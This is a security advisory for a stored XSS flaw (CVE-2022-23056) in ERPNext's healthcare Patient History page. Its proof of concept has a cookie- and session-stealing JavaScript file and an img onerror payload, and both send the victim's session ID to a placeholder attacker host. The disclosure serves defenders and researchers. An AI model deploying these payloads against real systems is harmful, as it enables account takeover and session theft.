CVE-2022-23056
Date: June 22, 2022
Overview
In ERPNext, versions v13.0.0-beta.13 through v13.30.0 are vulnerable to stored XSS on the Patient History page, which allows a low-privilege user to conduct an account takeover attack.
Details
ERPNext versions v13.0.0-beta.13 through v13.30.0 are vulnerable to stored XSS, which can lead to account takeover.
PoC Details
1. Log in to the application with a low-privilege user (such as a physician).
2. Navigate to the healthcare module and click on 'patients' under 'masters'.
3. Click on ‘new’ to create a new patient entry and fill in the details.
4. Create a file named “test.js” to steal the cookie from the victim.
var re = /\\"sid\\":\\s\\"[0-9a-zA-Z]+\\"/gm;
var te = /[0-9a-zA-Z]+/gm;
var getSID = (document.documentElement.innerHTML).match(re);
getSID = getSID[0].split(':');
getSID = getSID[1].match(te);
url = 'http://attacker-ip:attacker-port/?sid='+getSID;
var script = document.createElement('script');
script.src = url+"&details= " + document.cookie;
document.getElementsByTagName('head')[0].appendChild(script);
5. Type the malicious payload script into the 'surgical history' field and then click 'save' (the payload is listed under ‘PoC Code’).
6. Run an HTTP server (such as a simple HTTP server) to host the malicious file.
7. Open a new tab, log in to the application as an ‘administrator’, and navigate to ‘patient history’ under ‘records and history’ in the ‘healthcare’ area.
8. Search for the patient you created earlier; the patient history is loaded into the page and the malicious script stored in the ‘surgical history’ field is executed.
PoC Code
<img src=x onerror=this.src='http://attacker-ip:attacker-port/?c='+(((document.documentElement.innerHTML).match(/\"sid\":\s\"[0-9a-zA-Z]+\"/gm))[0].split(':')[1]).substring(2,58) >
Affected Environments
ERPNext versions v13.0.0-beta.13 through v13.30.0
Prevention
No fix version has been released yet.
Language: Python
Good to know:
| CVSS v3 metric | Value |
|---|---|
| Base Score | |
| Attack Vector (AV) | Network |
| Attack Complexity (AC) | Low |
| Privileges Required (PR) | Low |
| User Interaction (UI) | Required |
| Scope (S) | Changed |
| Confidentiality (C) | Low |
| Integrity (I) | Low |
| Availability (A) | None |

| CVSS v2 metric | Value |
|---|---|
| Base Score | |
| Access Vector (AV) | Network |
| Access Complexity (AC) | Medium |
| Authentication (AU) | Single |
| Confidentiality (C) | None |
| Integrity (I) | Partial |
| Availability (A) | None |